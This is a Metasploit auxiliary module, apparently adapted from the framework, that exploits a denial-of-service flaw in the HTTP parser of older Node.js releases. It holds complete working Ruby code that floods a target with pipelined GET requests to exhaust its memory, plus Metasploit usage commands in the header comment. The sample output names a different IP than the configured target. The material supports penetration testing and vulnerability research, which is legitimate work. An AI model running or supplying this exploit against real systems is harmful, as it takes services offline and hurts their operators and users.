#$ node -e "require('http').createServer(function(req, res){res.end();}).listen(9090);"
#msf> use auxiliary/dos/http/node_pipelining
#msf> set RHOST 127.0.0.1
#msf> set RPORT 9090
#msf> set RLIMIT 10000000 # depends on your machine
#msf> run
#...
#
#[*] DoS successful. 192.168.0.4:9090 not responding.
#
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
# Auxiliary DoS module for the Node.js HTTP pipelining issue.
#
# Affected releases and the remediation are those given in the description
# below: the parser lacks backpressure on pipelined requests in Node.js
# before 0.10.21 / 0.8.26, and upgrading to a fixed release closes it.
# Note that "DoS successful" is printed whenever ECONNRESET, EPIPE or
# Timeout::Error is raised while the module is still connected and writing,
# so a reset caused by anything else is reported the same way.
class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  # Registers module metadata and the RPORT / RLIMIT options.
  #
  # @param info [Hash] module info merged by the framework
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Node.js HTTP Pipelining DoS',
      'Description' => %q{
        This module exploits a DoS in the HTTP parser of Node.js versions
        released before 0.10.21 and 0.8.26. The vulnerability is caused by a
        lack of backpressure on pipelined requests, causing unbounded memory
        allocation for each request.
      },
      'Author'      => [ 'titanous', 'Marek Majkowski' ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'URL', 'https://github.com/joyent/node/issues/6214' ],
        ],
      'DisclosureDate' => 'Oct 18 2013'))

    register_options(
      [
        Opt::RPORT(80),
        OptInt.new('RLIMIT', [true, "Number of requests to send", 1000])
      ],
      self.class)
  end

  # Opens a single TCP connection and writes RLIMIT copies of the same GET
  # request without reading any response. A connection failure and a
  # mid-stream reset / EPIPE / timeout are each reported via print_status;
  # the socket is always released in ensure.
  def run
    target = target_label
    request = "GET / HTTP/1.1\r\nHost: #{target}\r\n\r\n"

    begin
      connect
      datastore['RLIMIT'].times { sock.put(request) }
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      print_status("Unable to connect to #{target}.")
    rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error
      print_status("DoS successful. #{target} not responding.")
    ensure
      disconnect
    end
  end

  private

  # "host" or "host:port" for the Host header and status output; the port
  # is appended only when it differs from 80.
  def target_label
    port = datastore['RPORT']
    return datastore['RHOST'] if port.to_i == 80

    datastore['RHOST'] + ":#{port}"
  end
end